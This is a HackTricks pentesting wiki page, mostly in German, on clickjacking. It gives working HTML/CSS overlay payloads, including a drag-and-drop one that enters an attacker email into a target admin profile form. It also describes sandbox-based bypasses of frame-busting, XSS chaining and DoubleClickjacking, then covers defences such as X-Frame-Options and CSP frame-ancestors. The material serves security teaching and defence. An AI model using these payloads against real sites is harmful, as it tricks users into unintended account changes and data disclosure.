Clickjacking

Reading time: 9 minutes

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

Was ist Clickjacking

Bei einem Clickjacking-Angriff wird ein Benutzer dazu getäuscht, auf ein Element einer Webseite zu klicken, das entweder unsichtbar ist oder als ein anderes Element getarnt wird. Diese Manipulation kann zu unbeabsichtigten Folgen für den Benutzer führen, wie dem Herunterladen von Malware, der Weiterleitung auf bösartige Webseiten, der Preisgabe von Zugangsdaten oder sensiblen Informationen, Geldüberweisungen oder dem Online-Kauf von Produkten.

Trick: Formulare vorbefüllen

Manchmal ist es möglich, die Werte der Felder eines Formulars per GET-Parameter beim Laden einer Seite zu füllen. Ein Angreifer kann dieses Verhalten ausnutzen, um ein Formular mit beliebigen Daten vorab auszufüllen und das Clickjacking-Payload zu platzieren, sodass der Benutzer den Button Submit drückt.

Formular mit Drag&Drop füllen

Wenn du den Benutzer dazu bringen musst, ein Formular auszufüllen, aber ihn nicht direkt bitten willst, bestimmte Informationen einzugeben (wie die E-Mail oder ein spezifisches Passwort, das du kennst), kannst du ihn einfach bitten, etwas per Drag&Drop zu verschieben, das deine kontrollierten Daten einträgt, wie in diesem Beispiel.

Basic Payload

css

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Mehrstufiger Payload

css

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Drag&Drop + Click-Payload

css

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

Wenn Sie eine XSS attack that requires a user to click auf ein Element identifiziert haben, um die XSS zu triggern, und die Seite für Clickjacking verwundbar ist, können Sie dies ausnutzen, um den Benutzer dazu zu bringen, auf den Button/Link zu klicken.\
Beispiel:\
Sie haben eine self XSS in einigen privaten Account-Details gefunden (Details, die nur Sie setzen und lesen können). Die Seite mit dem Formular, um diese Details zu setzen, ist vulnerable gegenüber Clickjacking und Sie können das Formular mit GET-Parametern prepopulate.
Ein Angreifer könnte eine Clickjacking-Attacke auf diese Seite vorbereiten, das Formular prepopulating mit dem XSS payload füllen und den User dazu tricksen, das Formular zu Submit. Wenn das Formular abgesendet wird und die Werte geändert sind, führt der User die XSS aus.

DoubleClickjacking

Firstly explained in this post, this technique would ask the victim to double click on a button of a custom page placed in a specific location, and use the timing differences between mousedown and onclick events to load the victim page duing the double click so the victim actually clicks a legit button in the victim page.

An example could be seen in this video: https://www.youtube.com/watch?v=4rGvRRMrD18

A code example can be found in this page.

warning

Diese Technik erlaubt es, den Benutzer dazu zu bringen, an einer Stelle auf der Opferseite zu klicken und damit alle Schutzmechanismen gegen Clickjacking zu umgehen. Der Angreifer muss also sensitive Aktionen finden, die mit nur einem Klick ausgeführt werden können, z. B. OAuth-Eingabeaufforderungen zum Akzeptieren von permissions.

Browser-Erweiterungen: DOM-based autofill clickjacking

Abgesehen vom Einbetten (iframes) von Opferseiten können Angreifer UI-Elemente von Browser extensions anvisieren, die in die Seite injiziert werden. Password managers rendern autofill-Dropdowns in der Nähe fokussierter Inputs; durch Fokussieren eines vom Angreifer kontrollierten Feldes und das Verbergen/Überdecken des Dropdowns der Erweiterung (Opacity/Overlay/Top-Layer-Tricks) kann ein erzwungener User-Klick ein gespeichertes Element auswählen und sensitive Daten in angreifer-kontrollierte Inputs füllen. Diese Variante erfordert keine iframe-Exposition und funktioniert vollständig über DOM/CSS-Manipulation.

For concrete techniques and PoCs see:

BrowExt - ClickJacking

Strategien zur Minderung von Clickjacking

Clientseitige Abwehrmaßnahmen

Skripte, die auf der Client-Seite ausgeführt werden, können Maßnahmen ergreifen, um Clickjacking zu verhindern:

Sicherstellen, dass das Anwendungsfenster das Haupt- oder Top-Fenster ist.
Alle Frames sichtbar machen.
Klicks auf unsichtbare Frames verhindern.
Potenzielle Clickjacking-Versuche erkennen und Benutzer warnen.

Diese frame-busting Scripts können jedoch umgangen werden:

Browsers' Security Settings: Einige Browser könnten diese Skripte basierend auf ihren Sicherheitseinstellungen oder fehlender JavaScript-Unterstützung blockieren.
HTML5 iframe sandbox Attribute: Ein Angreifer kann frame buster Skripte neutralisieren, indem er das sandbox-Attribut mit den Werten allow-forms oder allow-scripts ohne allow-top-navigation setzt. Dadurch kann das iframe nicht überprüfen, ob es das Top-Window ist, z. B.

html

<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>

Die Werte allow-forms und allow-scripts erlauben Aktionen innerhalb des , während die Top-Level-Navigation deaktiviert wird. Um die beabsichtigte Funktionalität der angegriffenen Site sicherzustellen, können je nach Angriffstyp zusätzliche Berechtigungen wie allow-same-origin und allow-modals erforderlich sein. Meldungen in der Browser-Konsole können Hinweise darauf geben, welche Berechtigungen erlaubt werden müssen.</p> <h3 id="server-side-defenses"><a class="header" href="#server-side-defenses">Server-Side Defenses</a></h3> <h4 id="x-frame-options"><a class="header" href="#x-frame-options">X-Frame-Options</a></h4> <p>Der <strong>X-Frame-Options HTTP response header</strong> informiert Browser darüber, ob das Rendern einer Seite in einem <frame> oder <iframe> legitim ist und hilft so, Clickjacking zu verhindern:</p> <ul> <li>X-Frame-Options: deny - Keine Domain kann den Inhalt fram(en).</li> <li>X-Frame-Options: sameorigin - Nur die aktuelle Site kann den Inhalt fram(en).</li> <li>X-Frame-Options: allow-from https://trusted.com - Nur die angegebene 'uri' darf die Seite fram(en).</li> <li>Hinweis zu den Einschränkungen: Wenn der Browser diese Direktive nicht unterstützt, funktioniert sie möglicherweise nicht. Manche Browser bevorzugen die CSP frame-ancestors Direktive.</li> </ul> <h4 id="content-security-policy-csp-frame-ancestors-directive"><a class="header" href="#content-security-policy-csp-frame-ancestors-directive">Content Security Policy (CSP) frame-ancestors directive</a></h4> <p>Die <strong>frame-ancestors directive in CSP</strong> ist die empfohlene Methode zum Schutz vor Clickjacking:</p> <ul> <li>frame-ancestors 'none' - Ähnlich wie X-Frame-Options: deny.</li> <li>frame-ancestors 'self' - Ähnlich wie X-Frame-Options: sameorigin.</li> <li>frame-ancestors trusted.com - Ähnlich wie X-Frame-Options: allow-from.</li> </ul> <p>Zum Beispiel erlaubt die folgende CSP nur das Framing von derselben Domain:</p> <p>Content-Security-Policy: frame-ancestors 'self';</p> <p>Weitere Details und komplexe Beispiele finden sich in der <a href="https://w3c.github.io/webappsec-csp/document/#directive-frame-ancestors">frame-ancestors CSP documentation</a> und in der <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors">Mozilla's CSP frame-ancestors documentation</a>.</p> <h3 id="content-security-policy-csp-with-child-src-and-frame-src"><a class="header" href="#content-security-policy-csp-with-child-src-and-frame-src">Content Security Policy (CSP) with child-src and frame-src</a></h3> <p><strong>Content Security Policy (CSP)</strong> ist eine Sicherheitsmaßnahme, die dabei hilft, Clickjacking und andere code injection attacks zu verhindern, indem sie festlegt, welche Quellen der Browser zum Laden von Inhalten zulassen soll.</p> <h4 id="frame-src-directive"><a class="header" href="#frame-src-directive">frame-src Directive</a></h4> <ul> <li>Definiert gültige Quellen für Frames.</li> <li>Spezifischer als die default-src directive.</li> </ul> <pre><code>Content-Security-Policy: frame-src 'self' https://trusted-website.com; </code></pre> <p>Diese Richtlinie erlaubt Frames von derselben Herkunft (self) und https://trusted-website.com.</p> <h4 id="child-src-direktive"><a class="header" href="#child-src-direktive">child-src Direktive</a></h4> <ul> <li>Eingeführt in CSP Level 2, um gültige Quellen für web workers und frames festzulegen.</li> <li>Fungiert als Fallback für frame-src und worker-src.</li> </ul> <pre><code>Content-Security-Policy: child-src 'self' https://trusted-website.com; </code></pre> <p>Diese Richtlinie erlaubt frames und workers von derselben Origin (self) und https://trusted-website.com.</p> <p><strong>Usage Notes:</strong></p> <ul> <li>Deprecation: child-src wird zugunsten von frame-src und worker-src schrittweise eingestellt.</li> <li>Fallback Behavior: Wenn frame-src fehlt, wird child-src als Fallback für frames verwendet. Fehlen beide, kommt default-src zur Anwendung.</li> <li>Strict Source Definition: Nur vertrauenswürdige Quellen in die Direktiven aufnehmen, um Ausnutzung zu verhindern.</li> </ul> <h4 id="javascript-frame-breaking-scripts"><a class="header" href="#javascript-frame-breaking-scripts">JavaScript Frame-Breaking Scripts</a></h4> <p>Obwohl nicht vollständig narrensicher, können JavaScript-based frame-busting scripts verwendet werden, um zu verhindern, dass eine Webseite in einem frame angezeigt wird. Beispiel:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">if (top !== self) { top.location = self.location } </code></pre> <h4 id="verwendung-von-anti-csrf-tokens"><a class="header" href="#verwendung-von-anti-csrf-tokens">Verwendung von Anti-CSRF-Tokens</a></h4> <ul> <li><strong>Token-Validierung:</strong> Verwende Anti-CSRF-Tokens in Webanwendungen, um sicherzustellen, dass zustandsändernde Anfragen absichtlich vom Benutzer ausgeführt werden und nicht über eine Clickjacked page.</li> </ul> <h2 id="referenzen"><a class="header" href="#referenzen">Referenzen</a></h2> <ul> <li><a href="https://portswigger.net/web-security/clickjacking"><strong>https://portswigger.net/web-security/clickjacking</strong></a></li> <li><a href="https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html"><strong>https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html</strong></a></li> <li><a href="https://marektoth.com/blog/dom-based-extension-clickjacking/">DOM-based Extension Clickjacking (marektoth.com)</a></li> </ul> <div class="mdbook-alerts mdbook-alerts-tip"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> tip </p> <p>Lernen & üben Sie AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/arte"><strong>HackTricks Training AWS Red Team Expert (ARTE)</strong></a><img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><br /> Lernen & üben Sie GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/grte"><strong>HackTricks Training GCP Red Team Expert (GRTE)</strong></a><img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"> Lernen & üben Sie Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/azrte"><strong>HackTricks Training Azure Red Team Expert (AzRTE)</strong></a><img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"></p> <details> <summary>Unterstützen Sie HackTricks</summary> <ul> <li>Überprüfen Sie die <a href="https://github.com/sponsors/carlospolop"><strong>Abonnementpläne</strong></a>!</li> <li><strong>Treten Sie der</strong> 💬 <a href="https://discord.gg/hRep4RUj7f"><strong>Discord-Gruppe</strong></a> oder der <a href="https://t.me/peass"><strong>Telegram-Gruppe</strong></a> bei oder <strong>folgen</strong> Sie uns auf <strong>Twitter</strong> 🐦 <a href="https://twitter.com/hacktricks_live"><strong>@hacktricks_live</strong></a><strong>.</strong></li> <li><strong>Teilen Sie Hacking-Tricks, indem Sie PRs an die</strong> <a href="https://github.com/carlospolop/hacktricks"><strong>HackTricks</strong></a> und <a href="https://github.com/carlospolop/hacktricks-cloud"><strong>HackTricks Cloud</strong></a> GitHub-Repos senden.</li> </ul> </details> </div> </main> <nav class="nav-wrapper" aria-label="Page navigation">  <a rel="prev" href="../pentesting-web/cache-deception/cache-poisoning-to-dos.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i> </a> <a rel="next prefetch" href="../pentesting-web/client-side-template-injection-csti.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <i class="fa fa-angle-right"></i> </a> <div style="clear: both"></div> </nav> <nav class="nav-wide-wrapper" aria-label="Page navigation"> <a rel="prev" href="../pentesting-web/cache-deception/cache-poisoning-to-dos.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i><span style="font-size: medium; align-self: center; margin-left: 10px;">Cache Poisoning to DoS</span> </a> <a rel="next prefetch" href="../pentesting-web/client-side-template-injection-csti.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <span style="font-size: medium; align-self: center; margin-right: 10px;">Client Side Template Injection (CSTI)</span><i class="fa fa-angle-right"></i> </a> </nav> </div> <div class="sidetoc"> <div class="sidetoc-wrapper"> <nav class="pagetoc"></nav> <a class="sidesponsor" href="" target="_blank"> <img src="" alt="" srcset=""> <div class="sponsor-title"> </div> <div class="sponsor-description"> </div> <div class="sponsor-cta"></div> </a> </div> </div> </div> <div class="footer"> <div id="theme-wrapper" class="theme-wrapper"> <div id="theme-btns" class="theme-btns"> <button id="hacktricks-light" type="button" role="radio" aria-label="Switch to light theme" aria-checked="false" class="theme"> <i class="fa fa-sun-o"></i> </button> <button id="hacktricks-dark" type="button" role="radio" aria-label="Switch to dark theme" aria-checked="false" class="theme theme-selected"> <i class="fa fa-moon-o"></i> </button> </div> </div> </div> </div> </div> <script> window.playground_copyable = true; </script> <script src="../elasticlunr.min.js"></script> <script src="../mark.min.js"></script>  <script src="../clipboard.min.js"></script> <script src="../highlight.js"></script> <script src="../book.js"></script>  <script src="../theme/pagetoc.js"></script> <script src="../theme/tabs.js"></script> <script src="../theme/ht_searcher.js"></script> <script src="../theme/sponsor.js"></script> <script src="../theme/ai.js"></script>  <script defer src="https://www.fairanalytics.de/pixel/deXeO7BNBrMuhdG1"></script> </div> </body> </html>